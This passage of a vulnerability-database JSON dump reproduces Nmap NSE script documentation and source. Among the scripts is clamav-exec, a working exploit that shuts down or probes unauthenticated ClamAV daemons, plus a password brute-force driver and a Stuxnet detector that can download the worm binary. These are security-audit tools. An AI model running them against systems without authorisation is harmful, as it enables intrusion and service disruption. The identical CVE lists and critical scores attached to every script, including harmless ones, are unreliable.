the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return brute.Error object on failure\n -- creds.Account object on success\n login = function( self, username, password )\n local data = (\"#UI %s,%s\\n\"):format(username,password)\n local status\n\n if ( not_admins[username] ) then\n return false, brute.Error:new( \"Incorrect password\" )\n end\n\n status, data = self.socket:send( data )\n if ( not(status) ) then\n local err = brute.Error:new( data )\n err:setRetry(true)\n return false, err\n end\n\n status, data = self.socket:receive_bytes(5)\n\n if ( status and data:match(\"NOT_REG_ADMIN\") ) then\n not_admins[username] = true\n elseif( status and data:match(\"VALID_USER\") ) then\n return true, creds.Account:new( username, password, creds.State.VALID)\n end\n\n return false, brute.Error:new( \"Incorrect password\" )\n\n end,\n\n disconnect = function( self )\n self.sockpool:releaseSocket( self.socket )\n end,\n\n}\n\n\naction = function(host, port)\n local status, result\n local pool = SocketPool:new(10)\n local engine = brute.Engine:new(Driver, host, port, pool )\n\n engine.options.script_name = SCRIPT_NAME\n status, result = engine:start()\n pool:shutdown()\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:25", "description": "Retrieves the day and time from the Time service.\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 37/tcp open time\n |_rfc868-time: 2013-10-23T10:33:00\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [datetime](<../lib/datetime.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [nmap](<../lib/nmap.html>)\n * [os](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-10-23T17:45:48", "type": "nmap", "title": "rfc868-time NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:RFC868-TIME.NSE", "href": "https://nmap.org/nsedoc/scripts/rfc868-time.html", "sourceData": "local comm = require \"comm\"\nlocal datetime = require \"datetime\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal nmap = require \"nmap\"\nlocal os = require \"os\"\n\ndescription = [[\nRetrieves the day and time from the Time service.\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE\n-- 37/tcp open time\n-- |_rfc868-time: 2013-10-23T10:33:00\n\nauthor = \"Daniel Miller\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"version\"}\n\n\nportrule = shortport.version_port_or_service(37, \"time\", {\"tcp\", \"udp\"})\n\naction = function(host, port)\n local status, result = comm.exchange(host, port, \"\", {bytes=4})\n\n if status then\n local stamp\n local width = #result\n if width == 4 then\n stamp = string.unpack(\">I4\", result)\n port.version.extrainfo = \"32 bits\"\n elseif width == 8 then\n stamp = string.unpack(\">I4\", result)\n port.version.extrainfo = \"64 bits\"\n else\n stdnse.debug1(\"Odd response: %s\", stringaux.filename_escape(result))\n return nil\n end\n\n -- RFC 868 epoch is Jan 1, 1900\n stamp = stamp - 2208988800\n\n -- Make sure we don't stomp a more-likely service detection.\n if port.version.name == \"time\" then\n local recvtime = os.time()\n local diff = os.difftime(stamp,recvtime)\n if diff < 0 then diff = -diff end\n -- confidence decreases by 1 for each year the time is off.\n stdnse.debug1(\"Time difference: %d seconds (%0.2f years)\", diff, diff / 31556926)\n local confidence = 10 - diff / 31556926\n if confidence < 0 then confidence = 0 end\n datetime.record_skew(host, stamp, recvtime)\n port.version.name_confidence = confidence\n nmap.set_port_version(host, port, \"hardmatched\")\n end\n\n return datetime.format_timestamp(stamp)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:24", "description": "Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution. \n\nClamAV server 0.99.2, and possibly other previous versions, allow the execution of dangerous service commands without authentication. Specifically, the command 'SCAN' may be used to list system files and the command 'SHUTDOWN' shut downs the service. This vulnerability was discovered by Alejandro Hernandez (nitr0us). \n\nThis script without arguments test the availability of the command 'SCAN'. \n\nReference: \n\n * <https://twitter.com/nitr0usmx/status/740673507684679680>\n * <https://bugzilla.clamav.net/show_bug.cgi?id=11585>\n\n## Script Arguments \n\n#### clamav-exec.scandb \n\nDatabase to file list.\n\n#### clamav-exec.cmd \n\nCommand to execute. Option: scan and shutdown\n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script clamav-exec <target>\n nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>\n nmap --script clamav-exec --script-args cmd='shutdown' <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 3310/tcp open clam ClamAV 0.99.2 (21714)\n | clamav-exec:\n | VULNERABLE:\n | ClamAV Remote Command Execution\n | State: VULNERABLE\n | ClamAV 0.99.2, and possibly other previous versions, allow the execution of the\n | clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'\n | may be used to enumerate system files and the command 'SHUTDOWN' shut downs the\n | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).\n |\n | Disclosure date: 2016-06-8\n | Extra information:\n | SCAN command is enabled.\n | References:\n | https://bugzilla.clamav.net/show_bug.cgi?id=11585\n |_ https://twitter.com/nitr0usmx/status/740673507684679680\n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [vulns](<../lib/vulns.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [io](<>)\n * [string](<>)\n * [comm](<../lib/comm.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-20T05:50:04", "type": "nmap", "title": "clamav-exec NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-09-19T17:31:57", "id": "NMAP:CLAMAV-EXEC.NSE", "href": "https://nmap.org/nsedoc/scripts/clamav-exec.html", "sourceData": "local shortport = require \"shortport\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal io = require \"io\"\nlocal string = require \"string\"\nlocal comm = require \"comm\"\n\ndescription = [[\nExploits ClamAV servers vulnerable to unauthenticated clamav comand execution.\n\nClamAV server 0.99.2, and possibly other previous versions, allow the execution\nof dangerous service commands without authentication. Specifically, the command 'SCAN'\nmay be used to list system files and the command 'SHUTDOWN' shut downs the\nservice. This vulnerability was discovered by Alejandro Hernandez (nitr0us).\n\nThis script without arguments test the availability of the command 'SCAN'.\n\nReference:\n* https://twitter.com/nitr0usmx/status/740673507684679680\n* https://bugzilla.clamav.net/show_bug.cgi?id=11585\n]]\n\n---\n-- @usage\n-- nmap -sV --script clamav-exec <target>\n-- nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>\n-- nmap --script clamav-exec --script-args cmd='shutdown' <target>\n--\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 3310/tcp open clam ClamAV 0.99.2 (21714)\n-- | clamav-exec:\n-- | VULNERABLE:\n-- | ClamAV Remote Command Execution\n-- | State: VULNERABLE\n-- | ClamAV 0.99.2, and possibly other previous versions, allow the execution of the\n-- | clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'\n-- | may be used to enumerate system files and the command 'SHUTDOWN' shut downs the\n-- | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).\n-- |\n-- | Disclosure date: 2016-06-8\n-- | Extra information:\n-- | SCAN command is enabled.\n-- | References:\n-- | https://bugzilla.clamav.net/show_bug.cgi?id=11585\n-- |_ https://twitter.com/nitr0usmx/status/740673507684679680\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">ClamAV Remote Command Execution</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>ClamAV 0.99.2, and possibly other previous versions, allow the execution\n-- of the 
clamav commands SCAN and SHUTDOWN without authentication.\n-- The command 'SCAN' 
may be used to enumerate system files and\n-- the command 'SHUTDOWN' shut downs the 
service.\n-- This vulnerability was discovered by Alejandro Hernandez (nitr0us).
</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2016</elem>\n-- <elem key=\"day\">8</elem>\n-- <elem key=\"month\">06</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2016-06-8</elem>\n-- <table key=\"extra_info\">\n-- <elem>SCAN command is enabled.</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://bugzilla.clamav.net/show_bug.cgi?id=11585</elem>\n-- <elem>https://twitter.com/nitr0usmx/status/740673507684679680</elem>\n-- </table>\n-- </table>\n--\n-- @args clamav-exec.cmd Command to execute. Option: scan and shutdown\n-- @args clamav-exec.scandb Database to file list.\n---\n\nauthor = \"Paulino Calderon <calderon()websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\", \"vuln\"}\n\nportrule = shortport.port_or_service(3310, \"clam\")\n\nlocal function shutdown(host, port)\n local status, data = comm.exchange(host, port, \"SHUTDOWN\")\n if not status and data == \"EOF\" then\n stdnse.debug1(\"Expected EOF response to SHUTDOWN command:%s\", data)\n return true\n end\n return nil\nend\n\n---\n-- scan(host, port, file)\n-- Sends SCAN %FILE command to clamav.\n-- If no file is specified, we query a non existing file to check the response.\n--\nlocal function scan(host, port, file)\n local status, data\n\n if not file then\n status, data = comm.exchange(host, port, \"SCAN /trinity/loves/nmap\")\n if not status then\n stdnse.debug1(\"Failed to send SCAN command:%s\", data)\n return nil\n end\n\n if data and data:match(\"No such file\") then\n stdnse.debug1(\"SCAN command enabled.\")\n return true, nil\n end\n else\n status, data = comm.exchange(host, port, \"SCAN \" .. file)\n if not status then\n stdnse.debug1(\"Failed to send 'SCAN %s' command:%s\", file, data)\n return nil\n end\n if data and data:match(\"OK\") then\n stdnse.debug1(\"File '%s' exists\", file)\n return true, true\n else\n stdnse.debug1(\"File '%s' does not exists\", file)\n return true, nil\n end\n end\n\n return nil\nend\n\nlocal function check_clam(host, port)\n local status, data = comm.exchange(host, port, \"PING\")\n if not status then\n stdnse.debug1(\"Failed to send PING command:%s\", data)\n return nil\n end\n if data and data:match(\"PONG\") then\n stdnse.debug1(\"PONG response received\")\n return true\n end\n return nil\nend\n\naction = function(host, port)\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or nil\n local scandb = stdnse.get_script_args(SCRIPT_NAME..\".scandb\") or nil\n\n if cmd == \"scan\" and not scandb then\n return \"The argument 'scandb' must be set if we are using the command 'SCAN'\"\n end\n\n --Check the service and update the port table\n local clamchk = check_clam(host, port)\n if clamchk then\n stdnse.debug1(\"ClamAV daemon found\")\n port.version.name = \"clam\"\n port.version.product = \"ClamAV\"\n nmap.set_port_version(host, port)\n end\n\n local vuln = {\n title = 'ClamAV Remote Command Execution',\n state = vulns.STATE.NOT_VULN,\n description = [[\nClamAV 0.99.2, and possibly other previous versions, allow the execution of the\nclamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'\nmay be used to enumerate system files and the command 'SHUTDOWN' shut downs the\nservice. This vulnerability was discovered by Alejandro Hernandez (nitr0us).\n]],\n references = {\n 'https://bugzilla.clamav.net/show_bug.cgi?id=11585',\n 'https://twitter.com/nitr0usmx/status/740673507684679680'\n },\n dates = {\n disclosure = {year = '2016', month = '06', day = '8'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local status, files = nil\n\n if cmd == \"scan\" then\n local file = io.open(scandb, \"r\")\n if not file then\n stdnse.debug1(\"Couldn't open file '%s'\", scandb)\n return nil\n end\n local files = {}\n local exists\n while true do\n local db_line = file:read()\n if not db_line then\n break\n end\n status, exists = scan(host, port, db_line)\n if status and exists then\n table.insert(files, string.format(\"%s - FOUND!\", db_line))\n end\n end\n if #files > 0 then\n vuln.extra_info = stdnse.format_output(true, files)\n vuln.state = vulns.STATE.VULN\n end\n elseif cmd == \"shutdown\" then\n status = shutdown(host, port)\n if status then\n vuln.extra_info = \"SHUTDOWN command sent successfully.\"\n vuln.state = vulns.STATE.VULN\n end\n else\n status, files = scan(host, port, nil)\n if status then\n vuln.extra_info = \"SCAN command is enabled.\"\n vuln.state = vulns.STATE.VULN\n end\n end\n\n return vuln_report:make_output(vuln)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:01", "description": "Detects whether a host is infected with the Stuxnet worm (<http://en.wikipedia.org/wiki/Stuxnet>). \n\nAn executable version of the Stuxnet infection will be downloaded if a format for the filename is given on the command line.\n\n### See also:\n\n * [ smb-vuln-ms10-061.nse ](<../scripts/smb-vuln-ms10-061.html>)\n\n## Script Arguments \n\n#### stuxnet-detect.save \n\nPath to save Stuxnet executable under, with `%h` replaced by the host's IP address, and `%v` replaced by the version of Stuxnet.\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script stuxnet-detect -p 445 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 445/tcp open microsoft-ds syn-ack\n \n Host script results:\n |_stuxnet-detect: INFECTED (version 4c:04:00:00:01:00:00:00)\n \n\n## Requires \n\n * [io](<>)\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-12-12T22:40:42", "type": "nmap", "title": "stuxnet-detect NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:STUXNET-DETECT.NSE", "href": "https://nmap.org/nsedoc/scripts/stuxnet-detect.html", "sourceData": "local io = require \"io\"\nlocal msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nDetects whether a host is infected with the Stuxnet worm (http://en.wikipedia.org/wiki/Stuxnet).\n\nAn executable version of the Stuxnet infection will be downloaded if a format\nfor the filename is given on the command line.\n]]\n\n---\n-- @usage\n-- nmap --script stuxnet-detect -p 445 <host>\n--\n-- @args stuxnet-detect.save Path to save Stuxnet executable under, with\n-- <code>%h</code> replaced by the host's IP address, and <code>%v</code>\n-- replaced by the version of Stuxnet.\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 445/tcp open microsoft-ds syn-ack\n--\n-- Host script results:\n-- |_stuxnet-detect: INFECTED (version 4c:04:00:00:01:00:00:00)\n--\n-- @see smb-vuln-ms10-061.nse\n\nauthor = \"Mak Kolybabi\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nlocal STUXNET_PATHS = {\"\\\\\\\\browser\", \"\\\\\\\\ntsvcs\", \"\\\\\\\\pipe\\\\browser\", \"\\\\\\\\pipe\\\\ntsvcs\"}\nlocal STUXNET_UUID = \"\\xe1\\x04\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\"\nlocal STUXNET_VERSION = 0x01\n\nlocal RPC_GET_VERSION = 0x00\nlocal RPC_GET_EXECUTABLE = 0x04\n\nlocal function check_infected(host, path, save)\n local file, result, session, status, version\n\n -- Create an SMB session.\n status, session = msrpc.start_smb(host, path)\n if not status then\n stdnse.debug1(\"Failed to establish session on %s.\", path)\n return false, nil\n end\n\n -- Bind to the Stuxnet service.\n status, result = msrpc.bind(session, STUXNET_UUID, STUXNET_VERSION, nil)\n if not status or result[\"ack_result\"] ~= 0 then\n stdnse.debug1(\"Failed to bind to Stuxnet service.\")\n msrpc.stop_smb(session)\n return false, nil\n end\n\n -- Request version of Stuxnet infection.\n status, result = msrpc.call_function(session, RPC_GET_VERSION, \"\")\n if not status then\n stdnse.debug1(\"Failed to retrieve Stuxnet version: %s\", result)\n msrpc.stop_smb(session)\n return false, nil\n end\n version = stdnse.tohex(result.arguments, {separator = \":\"})\n\n -- Request executable of Stuxnet infection.\n if save then\n local file, fmt\n\n status, result = msrpc.call_function(session, RPC_GET_EXECUTABLE, \"\")\n if not status then\n stdnse.debug1(\"Failed to retrieve Stuxnet executable: %s\", result)\n msrpc.stop_smb(session)\n return true, version\n end\n\n fmt = save:gsub(\"%%h\", host.ip)\n fmt = fmt:gsub(\"%%v\", version)\n file = io.open(stringaux.filename_escape(fmt), \"w\")\n if file then\n stdnse.debug1(\"Wrote %d bytes to file %s.\", #result.arguments, fmt)\n file:write(result.arguments)\n file:close()\n else\n stdnse.debug1(\"Failed to open file: %s\", fmt)\n end\n end\n\n -- Destroy the SMB session\n msrpc.stop_smb(session)\n\n return true, version\nend\n\nhostrule = function(host)\n return (smb.get_port(host) ~= nil)\nend\n\naction = function(host, port)\n local _, path, result, save, status\n\n -- Get script arguments.\n save = stdnse.get_script_args(\"stuxnet-detect.save\")\n\n -- Try to find Stuxnet on this host.\n for _, path in pairs(STUXNET_PATHS) do\n status, result = check_infected(host, path, save)\n if status then\n return \"INFECTED (version \" .. result .. \")\"\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:16", "description": "Requests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n\n## Example Usage \n \n \n nmap -sU -p 177 --script xdmcp-discover <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 177/udp open|filtered xdmcp\n | xdmcp-discover:\n | Session id: 0x0000703E\n | Authorization name: MIT-MAGIC-COOKIE-1\n |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/xdmcp-discover.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nRequests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 177 --script xdmcp-discover <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 177/udp open|filtered xdmcp\n-- | xdmcp-discover:\n-- | Session id: 0x0000703E\n-- | Authorization name: MIT-MAGIC-COOKIE-1\n-- |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n\nportrule = shortport.port_or_service(177, \"xdmcp\", \"udp\")\n\nlocal mutex = nmap.mutex(\"xdmcp-discover\")\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n\naction = function(host, port)\n\n local DISPLAY_ID = 1\n local result = {}\n\n local helper = xdmcp.Helper:new(host, port)\n local status = helper:connect()\n if ( not(status) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local status, response = helper:createSession(nil,\n {\"MIT-MAGIC-COOKIE-1\", \"XDM-AUTHORIZATION-1\"}, DISPLAY_ID)\n\n if ( not(status) ) then\n return fail(\"Failed to create xdmcp session\")\n end\n\n table.insert(result, (\"Session id: 0x%.8X\"):format(response.session_id))\n if ( response.auth_name and 0 < #response.auth_name ) then\n table.insert(result, (\"Authentication name: %s\"):format(response.auth_name))\n end\n if ( response.auth_data and 0 < #response.auth_data ) then\n table.insert(result, (\"Authentication data: %s\"):format(stdnse.tohex(response.auth_data)))\n end\n if ( response.authr_name and 0 < #response.authr_name ) then\n table.insert(result, (\"Authorization name: %s\"):format(response.authr_name))\n end\n if ( response.authr_data and 0 < #response.authr_data ) then\n table.insert(result, (\"Authorization data: %s\"):format(stdnse.tohex(response.authr_data)))\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:24", "description": "Connects to a remote RMI registry and attempts to dump all of its objects. \n\nFirst it tries to determine the names of all objects bound in the registry, and then it tries to determine information about the objects, such as the the class names of the superclasses and interfaces. This may, depending on what the registry is used for, give valuable information about the service. E.g, if the app uses JMX (Java Management eXtensions), you should see an object called \"jmxconnector\" on it. \n\nIt also gives information about where the objects are located, (marked with @<ip>:port in the output). \n\nSome apps give away the classpath, which this scripts catches in so-called \"Custom data\".\n\n## Example Usage \n \n \n nmap --script rmi-dumpregistry -p 1098 <host>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 1099/tcp open rmiregistry syn-ack\n | rmi-dumpregistry:\n | cfassembler/default\n | coldfusion.flex.rmi.DataServicesCFProxyServer_Stub\n | @192.168.0.3:1271\n | extends\n | java.rmi.server.RemoteStub\n | extends\n | java.rmi.server.RemoteObject\n | Custom data\n | Classpath\n | file:/C:/CFusionMX7/runtime/../lib/ant-launcher.jar\n | file:/C:/CFusionMX7/runtime/../lib/ant.jar\n | file:/C:/CFusionMX7/runtime/../lib/axis.jar\n | file:/C:/CFusionMX7/runtime/../lib/backport-util-concurrent.jar\n | file:/C:/CFusionMX7/runtime/../lib/bcel.jar\n | file:/C:/CFusionMX7/runtime/../lib/cdo.jar\n | file:/C:/CFusionMX7/runtime/../lib/cdohost.jar\n | file:/C:/CFusionMX7/runtime/../lib/cf4was.jar\n | file:/C:/CFusionMX7/runtime/../lib/cf4was_ae.jar\n | file:/C:/CFusionMX7/runtime/../lib/cfmx-ssl.jar\n | file:/C:/CFusionMX7/runtime/../lib/cfusion.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-beanutils-1.5.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-collections-2.1.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-digester-1.3.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-digester-1.7.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-discovery-0.2.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-discovery.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-logging-1.0.2.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-logging-api-1.0.2.jar\n | file:/C:/CFusionMX7/runtime/../lib/commons-net-1.2.2.jar\n | file:/C:/CFusionMX7/runtime/../lib/crystal.jar\n | file:/C:/CFusionMX7/runtime/../lib/flashgateway.jar\n | file:/C:/CFusionMX7/runtime/../lib/flashremoting_update.jar\n | file:/C:/CFusionMX7/runtime/../lib/flex-assemblerservice.jar\n | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-common.jar\n | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-opt.jar\n | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-req.jar\n | file:/C:/CFusionMX7/runtime/../lib/flex-messaging.jar\n | file:/C:/CFusionMX7/runtime/../lib/httpclient.jar\n | file:/C:/CFusionMX7/runtime/../lib/ib61patch.jar\n | file:/C:/CFusionMX7/runtime/../lib/ib6addonpatch.jar\n | file:/C:/CFusionMX7/runtime/../lib/ib6core.jar\n | file:/C:/CFusionMX7/runtime/../lib/ib6swing.jar\n | file:/C:/CFusionMX7/runtime/../lib/ib6util.jar\n | file:/C:/CFusionMX7/runtime/../lib/im.jar\n | file:/C:/CFusionMX7/runtime/../lib/iText.jar\n | file:/C:/CFusionMX7/runtime/../lib/iTextAsian.jar\n | file:/C:/CFusionMX7/runtime/../lib/izmado.jar\n | file:/C:/CFusionMX7/runtime/../lib/jakarta-oro-2.0.6.jar\n | file:/C:/CFusionMX7/runtime/../lib/java2wsdl.jar\n | file:/C:/CFusionMX7/runtime/../lib/jaxrpc.jar\n | file:/C:/CFusionMX7/runtime/../lib/jdom.jar\n | file:/C:/CFusionMX7/runtime/../lib/jeb.jar\n | file:/C:/CFusionMX7/runtime/../lib/jintegra.jar\n | file:/C:/CFusionMX7/runtime/../lib/ldap.jar\n | file:/C:/CFusionMX7/runtime/../lib/ldapbp.jar\n | file:/C:/CFusionMX7/runtime/../lib/log4j.jar\n | file:/C:/CFusionMX7/runtime/../lib/macromedia_drivers.jar\n | file:/C:/CFusionMX7/runtime/../lib/mail.jar\n | file:/C:/CFusionMX7/runtime/../lib/msapps.jar\n | file:/C:/CFusionMX7/runtime/../lib/pbclient42RE.jar\n | file:/C:/CFusionMX7/runtime/../lib/pbembedded42RE.jar\n | file:/C:/CFusionMX7/runtime/../lib/pbserver42RE.jar\n | file:/C:/CFusionMX7/runtime/../lib/pbtools42RE.jar\n | file:/C:/CFusionMX7/runtime/../lib/poi-2.5.1-final-20040804.jar\n | file:/C:/CFusionMX7/runtime/../lib/poi-contrib-2.5.1-final-20040804.jar\n | file:/C:/CFusionMX7/runtime/../lib/ri_generic.jar\n | file:/C:/CFusionMX7/runtime/../lib/saaj.jar\n | 